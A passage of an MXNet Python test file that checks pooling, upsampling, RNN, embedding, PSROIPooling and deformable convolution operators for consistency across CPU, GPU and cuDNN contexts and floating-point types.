test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value)
else:
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, count_include_pad=count_include_pad)
# pool_v1 has bugs when pad is not 0, do not test PoolingV1 here
pad = (2, 3)
stride = (2, 3)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (0, 0)
stride = (1, 1)
if pool_type == 'lp':
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value)
else:
if count_include_pad:
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False,
count_include_pad=count_include_pad)
else:
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False,
count_include_pad=count_include_pad)
# pool_v1 has bugs when pad is not 0, do not test PoolingV1 here
pad = (2, 3)
stride = (2, 3)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
if pool_type == 'lp':
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True, p_value=p_value)
else:
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True, count_include_pad=count_include_pad)
def test_3d_pooling(pool_type, p_value=2, count_include_pad=True):
data = (2, 3, 20, 20, 20)
kernel = (4, 5, 3)
pad = (0, 0, 0)
stride = (1, 1, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (2, 3, 3)
stride = (2, 3, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (0, 0, 0)
stride = (1, 1, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (2, 3, 3)
stride = (2, 3, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True, p_value=p_value, count_include_pad=count_include_pad)
test_1d_pooling('max')
test_1d_pooling('avg', count_include_pad=True)
test_1d_pooling('avg', count_include_pad=False)
test_1d_pooling('sum')
test_1d_pooling('lp', p_value=1)
test_1d_pooling('lp', p_value=2)
test_1d_pooling('lp', p_value=3)
test_2d_pooling('max')
test_2d_pooling('avg', count_include_pad=True)
test_2d_pooling('avg', count_include_pad=False)
test_2d_pooling('sum')
test_2d_pooling('lp', p_value=1)
test_2d_pooling('lp', p_value=2)
test_2d_pooling('lp', p_value=3)
test_3d_pooling('max')
test_3d_pooling('avg', count_include_pad=True)
test_3d_pooling('avg', count_include_pad=False)
test_3d_pooling('sum')
test_3d_pooling('lp', p_value=1)
test_3d_pooling('lp', p_value=2)
test_3d_pooling('lp', p_value=3)
@with_seed()
def test_global_pooling():
def test_1d_pooling(pool_type, p_value=2):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type, p_value=2):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
if pool_type != 'lp':
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_1d_pooling('lp', p_value=1)
test_1d_pooling('lp', p_value=2)
test_1d_pooling('lp', p_value=3)
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_2d_pooling('lp', p_value=1)
test_2d_pooling('lp', p_value=2)
test_2d_pooling('lp', p_value=3)
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']
shape = (2, 2, 10, 10)
for act_type in act_types:
sym = mx.sym.Activation(name='act', act_type=act_type)
ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
@with_seed()
def test_svmoutput_with_type():
sym = mx.sym.SVMOutput(name='svmoutput', use_linear=True)
ctx_list = [{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}}]
check_consistency(sym, ctx_list, use_uniform=True)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
def check_rnn_consistency(cell1, cell2):
dshape = (32, 5, 200)
data = mx.sym.Variable('data')
sym1, _ = cell1.unroll(5, data, merge_outputs=True)
mod1 = mx.mod.Module(sym1, label_names=None, context=mx.gpu(0))
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None)
sym2, _ = cell2.unroll(5, data, merge_outputs=True)
mod2 = mx.mod.Module(sym2, label_names=None, context=mx.gpu(0))
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
batch=mx.io.DataBatch(data=[mx.random.uniform(shape=dshape)], label=[])
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=1e-2, atol=1e-4)
@with_seed()
@assert_raises_cudnn_disabled()
def test_rnn():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='rnn_relu', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_disabled()
def test_lstm_forget_bias():
forget_bias = 2.0
fused = mx.rnn.FusedRNNCell(10, forget_bias=forget_bias, num_layers=2, mode='lstm', prefix='')
dshape = (32, 1, 20)
data = mx.sym.Variable('data')
sym, _ = fused.unroll(1, data, merge_outputs=True)
mod = mx.mod.Module(sym, label_names=None, context=mx.gpu(0))
mod.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod.init_params()
args, auxs = mod.get_params()
args = fused.unpack_weights(args)
bias_name = next(x for x in args if x.endswith('f_bias'))
expected_bias = forget_bias * np.ones(10, )
assert_allclose(args[bias_name].asnumpy(), expected_bias)
@with_seed()
@assert_raises_cudnn_disabled()
def test_gru():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(100, prefix='l0_'))
stack.add(mx.rnn.GRUCell(100, prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_disabled()
def test_bidirectional():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='',
bidirectional=True)
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l0_'),
mx.rnn.GRUCell(100, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l1_'),
mx.rnn.GRUCell(100, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_disabled()
def test_unfuse():
for mode in ['rnn_tanh', 'rnn_relu', 'lstm', 'gru']:
fused = mx.rnn.FusedRNNCell(
100, num_layers=2, mode=mode,
prefix='test_%s'%mode,
bidirectional=True,
dropout=0.5)
stack = fused.unfuse()
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_psroipooling_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3,
np.dtype(np.float16): 1e-2}
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, scale=0.1, tol=tol,
grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 10, 10),
# 'deformable_conv_offset': (2, 18, 8, 8),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_conv_offset': np.float16}},
]
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, scale=0.1, tol=tol,
grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'})
@with_seed()
def test_deformable_convolution_options():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
# 2D convolution
# Pad > 0
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Stride > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
